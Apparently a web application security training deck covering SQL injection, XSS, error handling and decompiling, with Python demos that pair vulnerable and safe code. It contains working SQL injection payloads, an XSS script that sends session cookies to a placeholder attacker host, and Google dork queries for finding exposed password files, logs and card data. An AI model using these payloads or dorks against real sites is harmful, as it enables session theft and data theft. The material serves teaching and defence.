Attack Types: Web Application Vulnerabilities (OWASP Top 10)
- Broken Access Control
- Broken Authentication and Session Management
- Buffer Overflows
- Denial of Service
- Insecure Configuration Management
- Poor Input Validation
- Injection Flaws (SQL Injection)
- Cross Site Scripting (XSS)
- Improper Error Handling
- Insecure Storage
- Reversing/decompiling

Attack Types: Web Application Vulnerabilities
Where can a web application be exploited? Inputs, outputs...
- Query strings (www.ezenta.com/file.php?id=34)
- Form parameters (&name=sarid&phone=)
- HTTP headers
- Cookies
- Local files?
- Anywhere a client has access to parameters
Attack Types: SQL Injection
The exploitation of weaknesses in a web application, ultimately enabling users to make use of functionality located within the database server.

Attack Types: SQL Injection (cont.)
Who is vulnerable?
- MS SQL
- Oracle
- Sybase
- DB2
- MySQL
- etc.
Not the fault of the database software, but rather of the developers that use these databases: any application that builds SQL by concatenating user input is affected, whatever the back end.

Attack Types: SQL Injection (cont.)
What can happen?
- Information leakage
- Data manipulation: INSERT, UPDATE, DELETE, ...
- Execution of stored procedures (e.g. MSSQL)
- Data theft
What would you want if you were the attacker?

Attack Types: SQL Injection (cont.)
How would an attacker launch an attack in an attempt to gain access to the web server/DB server?
Prerequisites:
- Some outbound traffic must be permitted, and the attacker must know which port is open
- The database user must be able to execute the EXEC command
- The attacker must have some server (TFTP/FTP) from which files can be retrieved
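The following is an added example, not code from the slides, showing the "information leakage" and "data theft" cases on a login form. The database, table names, credentials and the two attacker payloads are all constructed for the demonstration (SQLite stands in for the MS SQL/Oracle/MySQL back ends listed above; the technique is the same). It also shows the single-quote probe an attacker uses to find such a bug, which only works because the vulnerable version lets the database error surface.

```python
import sqlite3

# Constructed sample database (not from the slides): a users table used by the login
# page and an orders table the login page should never expose.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('alice', 'wonderland');
        INSERT INTO users (username, password) VALUES ('bob', 'builder');
        CREATE TABLE orders (id INTEGER PRIMARY KEY, card_number TEXT);
        INSERT INTO orders (card_number) VALUES ('4111111111111111');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: the attacker's text becomes SQL grammar."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Bound parameters: the driver passes the values separately, so quotes stay data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def probe_for_injection(conn, login):
    """The classic probe: a lone quote. A database error coming back means the input
    reaches the query unquoted (and the error page itself is improper error handling)."""
    try:
        login(conn, "'", "x")
        return None
    except sqlite3.Error as exc:
        return str(exc)


# Hypothetical attacker input, constructed here.
BYPASS_PASSWORD = "' OR '1'='1"                                 # WHERE ... AND password = '' OR '1'='1'
UNION_USERNAME = "x' UNION SELECT card_number FROM orders --"   # appends a second SELECT, comments out the rest


def run_demo():
    conn = build_db()
    return {
        "normal_safe": login_safe(conn, "alice", "wonderland"),
        "bypass_vulnerable": sorted(login_vulnerable(conn, "x", BYPASS_PASSWORD)),
        "bypass_safe": login_safe(conn, "x", BYPASS_PASSWORD),
        "union_vulnerable": login_vulnerable(conn, UNION_USERNAME, "anything"),
        "union_safe": login_safe(conn, UNION_USERNAME, "anything"),
        "probe_vulnerable_errors": probe_for_injection(conn, login_vulnerable) is not None,
        "probe_safe_errors": probe_for_injection(conn, login_safe) is not None,
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print("%-24s %s" % (name, result))
```

The bypass payload turns the WHERE clause into "... OR true" and logs the attacker in as every user at once; the UNION payload reads a table the login page never references, which is the data theft case. With bound parameters both payloads are simply usernames and passwords that match nothing.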
Web Application Security: Cross Site Scripting (XSS)

Attack Types: Cross Site Scripting (XSS)
An attack aimed at the users of a web application, made possible by poor programming practices (untrusted input echoed into the page without encoding).

Attack Types: Cross Site Scripting (cont.)
Two types:
- Transient (reflected): the exploit is composed and delivered. It is generally executed just the one time.
- Persistent (stored): the exploit is composed and written to some data store. An example is a forum post.

Attack Types: Cross Site Scripting (cont.)
Transient: the victim has to perform an action in order for the attack to work.
- Click on a link
- Download a file (eMule, Kazaa, Skype, MSN, ...)
Persistent: the attack is executed simply by visiting the compromised web application.

Attack Types: Cross Site Scripting (cont.)
So you can execute some script in the user's browser. Who cares? Right?

Attack Types: Cross Site Scripting (cont.)
What can happen? Information known only to the user and the web server (in this case session identifiers) can be stolen. Sound scary? Consider this...
- Ordering prescriptions over the net?
- Medical test results?
- On-line psychological consultations: are you sure you're chatting to a doctor?
- Using net bank?

Attack Types: Cross Site Scripting (cont.)
Net bank: a vulnerability was recently found that would enable an attacker to create a false net bank logon. When the user entered their username and password, the details were sent to a third-party server. This is real!

Attack Types: Cross Site Scripting (cont.)
Who is vulnerable?
- Java
- .NET
- ASP
- PHP
- CFM
- etc.
It's not MS', Sun's, Allaire's or Novell's fault (not always). It's the fault of the developer!

Attack Types: Cross Site Scripting (cont.)
How do users' sessions get hijacked?
1. A vulnerability is identified.
2. An exploit is developed (as shown on the next slide).
3. The exploit is sent to the victim (transient) or posted on a vulnerable page (persistent).
4. The user clicks on the link (transient) or visits the vulnerable page (persistent).
5. The user's session identifier is sent to the attacker.
6. The stolen session identifier is included in the attacker's request (shown in the demo).

Attack Types: Cross Site Scripting (cont.)
A simple transient XSS attack (all on one line):
<script> window.open('http://<ATTACKER>/write_to_file.o?Session='+document.cookie,'obj_window','fullscreen=no,toolbar=no,status=no,menubar=no,scrollbars=no,resizable=yes,directories=no,location=no,width=100,height=100'); </script>
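As an added example (not the slides' own code), the following shows the transient attack above end to end from the server's point of view: the attacker's link carrying the slide's payload in the query string, a page that reflects the parameter raw versus one that HTML-encodes it, and the Set-Cookie header a fail-safe session handler would emit. The page URL (www.ezenta.com/hello.php), the parameter name and the session id are assumptions made for the demonstration. The HttpOnly flag defeats this particular exfiltration (document.cookie cannot read the cookie) but not XSS as such; output encoding is the actual fix.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, quote, urlsplit

# The payload from the slide above, condensed to the parts that matter (<ATTACKER> is the
# slide's own placeholder for the attacker's host).
XSS_PAYLOAD = ("<script>window.open('http://<ATTACKER>/write_to_file.o?Session='"
               "+document.cookie,'obj_window','width=100,height=100');</script>")


def craft_link(base="http://www.ezenta.com/hello.php"):
    """The link sent to the victim (transient XSS): payload URL-encoded in the query string,
    so it survives the trip and does not look like markup in a mail client."""
    return base + "?name=" + quote(XSS_PAYLOAD, safe="")


def render_vulnerable(name):
    """Reflects the query-string value straight into the markup."""
    return "<html><body><h1>Hello %s</h1></body></html>" % name


def render_safe(name):
    """html.escape(quote=True) turns <, >, &, \" and ' into entities, so the browser shows
    the payload as text instead of running it."""
    return "<html><body><h1>Hello %s</h1></body></html>" % html.escape(name, quote=True)


def handle_request(url, renderer):
    """What the server does with the victim's click: decode the parameter, render the page."""
    params = parse_qs(urlsplit(url).query)
    name = params.get("name", ["world"])[0]
    return renderer(name)


def contains_live_script(page):
    """True if the response carries a real <script> tag the browser would execute."""
    return "<script>" in page.lower()


def session_cookie_header(session_id, http_only=True, secure=True):
    """Set-Cookie header for the session id. HttpOnly hides it from document.cookie,
    Secure keeps it off plain HTTP (the "but we use SSL" objection cuts both ways)."""
    c = SimpleCookie()
    c["SESSIONID"] = session_id
    c["SESSIONID"]["path"] = "/"
    c["SESSIONID"]["httponly"] = http_only
    c["SESSIONID"]["secure"] = secure
    return c.output()


if __name__ == "__main__":
    link = craft_link()
    print("victim clicks:", link)
    print("vulnerable page executes script:", contains_live_script(handle_request(link, render_vulnerable)))
    print("encoded page executes script:   ", contains_live_script(handle_request(link, render_safe)))
    print(session_cookie_header("abc123"))
```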
Attack Types: Improper Error Handling
Reading error messages in an attempt to gain an understanding of the platform and technologies deployed.

Attack Types: Improper Error Handling (cont.)
What can you learn from error messages?
- What database is being used
- If the developers are trying to hide which server-side technology is being used (e.g. by mapping *.abc files to asp.dll), the error message can disclose it anyway
- Usernames and passwords included in the connection string
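An added example, not from the slides, of the last two points side by side: a handler that writes the driver's exception into the response (disclosing the provider, host, user and password from the connection string) and one that fails safely with a generic message and a correlation id, logging the detail server-side with the password redacted. The connection string, the provider name in the error text and the stand-in driver are constructed for the demonstration.

```python
import logging
import re
import uuid

# Constructed values (not from the slides): a connection string of the kind that appears in
# verbose ASP/OLE DB error pages, and a fake driver that echoes it in its exception text.
CONN_STR = "Provider=SQLOLEDB;Data Source=db01;User ID=webapp;Password=s3cret!;"


class DriverError(Exception):
    pass


def open_connection(conn_str):
    """Stand-in for a database driver whose failure message includes the connection details."""
    raise DriverError("Microsoft OLE DB Provider for SQL Server: login failed. "
                      "Connection: " + conn_str)


def redact(text):
    """Keeps the server-side log useful without writing the password into it."""
    return re.sub(r"(?i)(password|pwd)=[^;]*", r"\1=***", text)


def page_vulnerable(conn_str):
    """Improper error handling: the raw exception goes straight into the response body."""
    try:
        open_connection(conn_str)
    except DriverError as exc:
        return "<h1>Error</h1><pre>%s</pre>" % exc
    return "<h1>OK</h1>"


def page_safe(conn_str, log=logging.getLogger("app")):
    """Fail safely: generic message plus a reference id for the user, redacted detail in the log."""
    try:
        open_connection(conn_str)
    except DriverError as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("ref=%s %s", ref, redact(str(exc)))
        return "<h1>Error</h1><p>The request could not be completed. Reference: %s</p>" % ref
    return "<h1>OK</h1>"


# Connection-string fields an attacker reads off a verbose error page.
SECRET_MARKERS = ("Provider=", "Data Source=", "User ID=", "Password=")


def leaks(page):
    """Which of the sensitive fields are visible in the returned page."""
    return [m for m in SECRET_MARKERS if m in page]


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    print("vulnerable page leaks:", leaks(page_vulnerable(CONN_STR)))
    print("safe page leaks:      ", leaks(page_safe(CONN_STR)))
```

The reference id is what lets support staff find the full entry in the log; the user never needs the stack trace or the connection string to report the problem.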
Attack Types: Reversing/decompiling
Java and .NET can be decompiled: the source code can be read.
What tools exist to enable this?
- Java: DJ Decompiler
- .NET: Salamander (http://www.remotesoft.com/salamander/)

Attack Types: Reversing/decompiling (cont.)
Differences between native code and VM code:
- Native code disassembles to assembly (ASM); the original source is gone.
- Java bytecode and .NET IL decompile to something very close to the original code, names and structure included, unless it was obfuscated.
Native code DEMO
Java/.NET DEMO

Attack Types: Reversing/decompiling (cont.)
Protection schemes for native code (packers/protectors):
- ASProtect
- ExeShield
- ACProtector
- Armadillo
- ExeCrypter
- PElock
Can they then be broken? It seems so.
What does the file look like afterwards?

Attack Types: Reversing/decompiling (cont.)
Protection schemes for Java/.NET:
- Obfuscation
- HASP
Can they then be broken?
What does the file look like afterwards?

Attack Types: Reversing/decompiling (cont.)
What protection schemes do you use? Do they work?
What can be done? Who is responsible?
- Customers can make demands!
- Development houses can educate developers!

What can be done? Design
- Threat modelling: understanding the threats (covered on day 2). Typical objections: "But we don't use sessions", "But we use SSL"
- Code reviews (briefly covered on day 2)
- Ask questions!
- Checklists
- Defence in depth
- Secure defaults

What can be done? Implementation
- Secure programming principles and practices; educate developers (think like an attacker)
- Input validation
- Output validation/encoding
- Fail safely
- Perform peer code reviews
- Reuse code that is known to be secure
- ...

What can be done? Audit
- Perform automated testing as well as manual testing (some of the available tools are covered on day two)
- Test at every development stage
- Make a test plan
- Test all components

What can be done? Configuration Management
The secure configuration of the implemented platform (covered on day 2).
Web Application Security: Web Applications and Google

Web Applications and Google: Google's advanced search operators (cont.)
Query modifiers (cont.):
- filetype:doc
- ext:php (same as above)
- inanchor:funnystuff (matches <a href=target>funnystuff</a>)
- numrange: or daterange: (dates represented as Julian day numbers)
- phonebook:first last state

Web Applications and Google: What can you use this for?
- Error messages, as shown earlier
- Password files
- Login pages
- Logs
- Shopping information
- Online devices
- Source code?

Web Applications and Google: Error messages, as shown earlier
Try to find error messages that you are familiar with by using Google's advanced operators.
- "A syntax error has occurred" filetype:ihtml
- "Incorrect syntax near"
- "Internal Server Error" "server at"

Web Applications and Google: Password files
Try to find some password details using Google.
- intitle:"index of /etc" intext:(passwd | shadow)
- inurl:admin ext:(mdb | log | pwd | tmp | txt) intext:"your password is *"
- intext:"please use the following username * and password *"

Web Applications and Google: Login pages
Find some login pages that you are familiar with.
- allinurl:login admin cms
- "You have requested access to a restricted area of our website. Please authenticate yourself to continue."
- intitle:"Tomcat Server Administration"

Web Applications and Google: Logs
Find some common log files using Google.
- inurl:log ext:(log | txt)
- inurl:admin ext:(log | txt) intitle:"index.of./"
- allinurl:logs ftp security

Web Applications and Google: Shopping information
Shopping information exists on web sites and Google knows about it. Find it!
- inurl:shop database
- Mastercard ext:(log | mdb | tmp | bak | txt)
- Visa ext:(log | mdb | tmp | bak | txt)
- Amex ext:(log | mdb | tmp | bak | txt)

Web Applications and Google: Online devices
Do you use any online devices like WAPs (wireless access points)? Find some online devices you are familiar with.
- intitle:"Live View / - AXIS"
- intitle:webeye inurl:login.ml
- inurl:"printer/main.html" intext:"settings"
- intitle:"Network Storage Link for USB 2.0 Disks" Firmware (http://173016th.com/)

Web Applications and Google: Source code
Find source code fragments with Google.
- intext:"ADODB.Recordset" ext:inc
- inurl:index.php.bak

Web Application Security: Summary
- Bad programming can introduce huge issues
- Security awareness and education can help raise security
- Google can be used for data mining
- Keep your environment clean